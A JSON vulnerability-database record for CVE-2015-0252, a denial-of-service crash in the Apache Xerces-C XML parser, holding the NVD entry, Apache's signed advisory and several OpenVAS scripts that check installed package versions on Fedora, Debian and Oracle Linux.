{"cve": [{"lastseen": "2018-10-18T15:09:32", "bulletinFamily": "NVD", "description": "internal/XMLReader.cpp in Apache Xerces-C before 3.1.2 allows remote attackers to cause a denial of service (segmentation fault and crash) via crafted XML data.", "modified": "2018-10-16T21:29:21", "published": "2015-03-24T13:59:01", "id": "CVE-2015-0252", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0252", "title": "CVE-2015-0252", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:58", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA512\r\n\r\n\r\nCVE-2015-0252: Apache Xerces-C XML Parser Crashes on Malformed Input\r\n\r\nSeverity: Important\r\n\r\nVendor: The Apache Software Foundation\r\n\r\nVersions Affected: Apache Xerces-C XML Parser library versions\r\nprior to V3.1.2\r\n\r\nDescription: The Xerces-C XML parser mishandles certain kinds of\r\nmalformed input documents, resulting in a segmentation fault during\r\na parse operation. The bug does not appear to allow for remote code\r\nexecution, but is a denial of service attack that in many applications\r\nmay allow for an unauthenticated attacker to supply malformed input\r\nand cause a crash.\r\n\r\nMitigation: Applications that are using library versions older than\r\nV3.1.2 should upgrade as soon as possible. Distributors of older versions\r\nshould apply the patches from this subversion revision:\r\n\r\nhttp://svn.apache.org/viewvc?view=revision&revision=1667870\r\n\r\nCredit: This issue was reported independently by Anton Rager and Jonathan\r\nBrossard from the Salesforce.com Product Security Team and by Ben Laurie\r\nof Google.\r\n\r\nReferences:\r\nhttp://xerces.apache.org/xerces-c/secadv/CVE-2015-0252.txt\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1\r\n\r\niQIcBAEBCgAGBQJVCzmVAAoJEDeLhFQCJ3lipRoP/RLr+6EyyUBp7PxXi31pHYbv\r\nz7E1GZLZ+349BydmI+28y6QXSjjQIeU1VXHaRdBCpfNqv2rIe7n+s/PvojprdHGZ\r\nOcxg7iPs+mQTxtkTJht1JqT1d4s96BN+DgPDRf7vUzMsu7u6mf9E+Ds2Yajddqgh\r\nzxmsv5YFJlppeAOKDbyaWPfivJS7ubjDK7SQ8Il5N7XHSmVcdGMjGh0Zmbn0mlzk\r\niTp13aoEknYI3M+4OpIgtszOgbsMQnhRwOgAX+0jBHxrWkK4MBNlotY6oPtx6zWt\r\nDjM/JRr9+V59BsQKrNmE/D0csoEf4OeBEgeqmNTjpy8EO+gOgVHWMowUUAVQkMqu\r\n37njc8IyR/JXStdtzJpHsj4HO2PE9ZE1Uy69DCqCDEeGWl61qx4+sg7Ul783dAab\r\nhCAvAO0zLiyPgkNdydmBQWGymHsle+niydNAi+EGj47rEJ7lDhJhl9qVQ0zyMXr4\r\nO1//QwV7BUaRcgQhcbvd71KeDkPBBNvwpYLAXxIpDkI1/2qjo8ANHxzu/EMP8weK\r\nN+KoIEugAab+t1s1qWpgneYXHLy3uE3KvVeNvb/iHsl5nzzFVBkPe+2OCZfWoedJ\r\nt7gAXaZ2htrF2BQl6g/5hm13/6ajmrtNcX0hBjx2VB4VACOtt0bqextaW/w2Vvb4\r\nAcsopfNHOGvXLDJ3JkHS\r\n=l9vC\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2015-03-21T00:00:00", "published": "2015-03-21T00:00:00", "id": "SECURITYVULNS:DOC:31812", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31812", "title": "Xerces-C Security Advisory [CVE-2015-0252]", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "openvas": [{"lastseen": "2018-09-01T23:50:56", "bulletinFamily": "scanner", "description": "Check the version of xerces-c", "modified": "2017-07-10T00:00:00", "published": "2015-03-31T00:00:00", "id": "OPENVAS:1361412562310869144", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869144", "title": "Fedora Update for xerces-c FEDORA-2015-4285", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xerces-c FEDORA-2015-4285\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869144\");\n script_version(\"$Revision: 6630 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:34:32 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-03-31 07:08:03 +0200 (Tue, 31 Mar 2015)\");\n script_cve_id(\"CVE-2015-0252\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for xerces-c FEDORA-2015-4285\");\n script_tag(name: \"summary\", value: \"Check the version of xerces-c\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Xerces-C is a validating XML parser written\nin a portable subset of C++. Xerces-C makes it easy to give your application the\nability to read and write XML data. A shared library is provided for parsing,\ngenerating, manipulating, and validating XML documents. Xerces-C is faithful to\nthe XML 1.0 recommendation and associated standards: XML 1.0 (Third Edition),\nXML 1.1 (First Edition), DOM Level 1, 2, 3 Core, DOM Level 2.0 Traversal and\nRange, DOM Level 3.0 Load and Save, SAX 1.0 and SAX 2.0, Namespaces in XML,\nNamespaces in XML 1.1, XML Schema, XML Inclusions).\n\");\n script_tag(name: \"affected\", value: \"xerces-c on Fedora 20\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2015-4285\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153923.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"xerces-c\", rpm:\"xerces-c~3.1.1~6.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:51:14", "bulletinFamily": "scanner", "description": "Check the version of xerces-c", "modified": "2017-07-10T00:00:00", "published": "2015-07-07T00:00:00", "id": "OPENVAS:1361412562310869679", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869679", "title": "Fedora Update for xerces-c FEDORA-2015-4226", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xerces-c FEDORA-2015-4226\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869679\");\n script_version(\"$Revision: 6630 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:34:32 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-07 06:33:34 +0200 (Tue, 07 Jul 2015)\");\n script_cve_id(\"CVE-2015-0252\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for xerces-c FEDORA-2015-4226\");\n script_tag(name: \"summary\", value: \"Check the version of xerces-c\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Xerces-C is a validating XML parser written\nin a portable subset of C++. Xerces-C makes it easy to give your application the\nability to read and write XML data. A shared library is provided for parsing,\ngenerating, manipulating, and validating XML documents. Xerces-C is faithful to\nthe XML 1.0 recommendation and associated standards: XML 1.0 (Third Edition),\nXML 1.1 (First Edition), DOM Level 1, 2, 3 Core, DOM Level 2.0 Traversal and\nRange, DOM Level 3.0 Load and Save, SAX 1.0 and SAX 2.0, Namespaces in XML,\nNamespaces in XML 1.1, XML Schema, XML Inclusions).\n\");\n script_tag(name: \"affected\", value: \"xerces-c on Fedora 22\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2015-4226\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2015-March/152882.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"xerces-c\", rpm:\"xerces-c~3.1.2~1.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:51:14", "bulletinFamily": "scanner", "description": "Anton Rager and Jonathan Brossard from\nthe Salesforce.com Product Security Team and Ben Laurie of Google discovered a\ndenial of service vulnerability in xerces-c, a validating XML parser library for\nC++. The parser mishandles certain kinds of malformed input documents, resulting\nin a segmentation fault during a parse operation. An unauthenticated\nattacker could use this flaw to cause an application using the\nxerces-c library to crash.", "modified": "2018-04-06T00:00:00", "published": "2015-03-20T00:00:00", "id": "OPENVAS:1361412562310703199", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703199", "title": "Debian Security Advisory DSA 3199-1 (xerces-c - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3199.nasl 9355 2018-04-06 07:16:07Z cfischer $\n# Auto-generated from advisory DSA 3199-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703199\");\n script_version(\"$Revision: 9355 $\");\n script_cve_id(\"CVE-2015-0252\");\n script_name(\"Debian Security Advisory DSA 3199-1 (xerces-c - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2018-04-06 09:16:07 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name: \"creation_date\", value: \"2015-03-20 00:00:00 +0100 (Fri, 20 Mar 2015)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3199.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"xerces-c on Debian Linux\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy),\nthis problem has been fixed in version 3.1.1-3+deb7u1.\n\nWe recommend that you upgrade your xerces-c packages.\");\n script_tag(name: \"summary\", value: \"Anton Rager and Jonathan Brossard from\nthe Salesforce.com Product Security Team and Ben Laurie of Google discovered a\ndenial of service vulnerability in xerces-c, a validating XML parser library for\nC++. The parser mishandles certain kinds of malformed input documents, resulting\nin a segmentation fault during a parse operation. An unauthenticated\nattacker could use this flaw to cause an application using the\nxerces-c library to crash.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libxerces-c-dev\", ver:\"3.1.1-3+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxerces-c-doc\", ver:\"3.1.1-3+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxerces-c-samples\", ver:\"3.1.1-3+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxerces-c3.1:amd64\", ver:\"3.1.1-3+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxerces-c3.1:i386\", ver:\"3.1.1-3+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:52:44", "bulletinFamily": "scanner", "description": "Check the version of xerces-c", "modified": "2017-07-10T00:00:00", "published": "2015-03-31T00:00:00", "id": "OPENVAS:1361412562310869143", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869143", "title": "Fedora Update for xerces-c FEDORA-2015-4251", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xerces-c FEDORA-2015-4251\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869143\");\n script_version(\"$Revision: 6630 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:34:32 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-03-31 07:08:01 +0200 (Tue, 31 Mar 2015)\");\n script_cve_id(\"CVE-2015-0252\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for xerces-c FEDORA-2015-4251\");\n script_tag(name: \"summary\", value: \"Check the version of xerces-c\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Xerces-C is a validating XML parser written\nin a portable subset of C++. Xerces-C makes it easy to give your application the\nability to read and write XML data. A shared library is provided for parsing,\ngenerating, manipulating, and validating XML documents. Xerces-C is faithful to\nthe XML 1.0 recommendation and associated standards: XML 1.0 (Third Edition),\nXML 1.1 (First Edition), DOM Level 1, 2, 3 Core, DOM Level 2.0 Traversal and\nRange, DOM Level 3.0 Load and Save, SAX 1.0 and SAX 2.0, Namespaces in XML,\nNamespaces in XML 1.1, XML Schema, XML Inclusions).\n\");\n script_tag(name: \"affected\", value: \"xerces-c on Fedora 21\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2015-4251\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153829.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"xerces-c\", rpm:\"xerces-c~3.1.1~8.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:52:13", "bulletinFamily": "scanner", "description": "Check the version of mingw-xerces-c", "modified": "2017-07-10T00:00:00", "published": "2015-03-31T00:00:00", "id": "OPENVAS:1361412562310869151", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869151", "title": "Fedora Update for mingw-xerces-c FEDORA-2015-4321", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mingw-xerces-c FEDORA-2015-4321\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869151\");\n script_version(\"$Revision: 6630 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:34:32 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-03-31 07:08:42 +0200 (Tue, 31 Mar 2015)\");\n script_cve_id(\"CVE-2015-0252\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for mingw-xerces-c FEDORA-2015-4321\");\n script_tag(name: \"summary\", value: \"Check the version of mingw-xerces-c\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Xerces-C is a validating XML parser written\nin a portable subset of C++. Xerces-C makes it easy to give your application the\nability to read and write XML data. A shared library is provided for parsing,\ngenerating, manipulating, and validating XML documents. Xerces-C is faithful to\nthe XML 1.0 recommendation and associated standards\n(DOM 1.0, DOM 2.0. SAX 1.0, SAX 2.0, Namespaces).\n\");\n script_tag(name: \"affected\", value: \"mingw-xerces-c on Fedora 21\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2015-4321\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153903.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"mingw-xerces-c\", rpm:\"mingw-xerces-c~3.1.1~11.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:52:17", "bulletinFamily": "scanner", "description": "Check the version of mingw-xerces-c", "modified": "2017-07-10T00:00:00", "published": "2015-07-07T00:00:00", "id": "OPENVAS:1361412562310869524", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869524", "title": "Fedora Update for mingw-xerces-c FEDORA-2015-4272", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mingw-xerces-c FEDORA-2015-4272\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869524\");\n script_version(\"$Revision: 6630 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:34:32 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-07 06:22:16 +0200 (Tue, 07 Jul 2015)\");\n script_cve_id(\"CVE-2015-0252\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for mingw-xerces-c FEDORA-2015-4272\");\n script_tag(name: \"summary\", value: \"Check the version of mingw-xerces-c\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Xerces-C is a validating XML parser written\nin a portable subset of C++. Xerces-C makes it easy to give your application the\nability to read and write XML data. A shared library is provided for parsing,\ngenerating, manipulating, and validating XML documents. Xerces-C is faithful to\nthe XML 1.0 recommendation and associated standards (DOM 1.0, DOM 2.0. SAX 1.0,\nSAX 2.0, Namespaces).\n\");\n script_tag(name: \"affected\", value: \"mingw-xerces-c on Fedora 22\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2015-4272\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153094.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"mingw-xerces-c\", rpm:\"mingw-xerces-c~3.1.2~1.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-28T18:23:23", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2015-1193", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123088", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123088", "title": "Oracle Linux Local Check: ELSA-2015-1193", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-1193.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123088\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 13:59:13 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-1193\");\n script_tag(name:\"insight\", value:\"ELSA-2015-1193 - xerces-c security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-1193\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-1193.html\");\n script_cve_id(\"CVE-2015-0252\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n 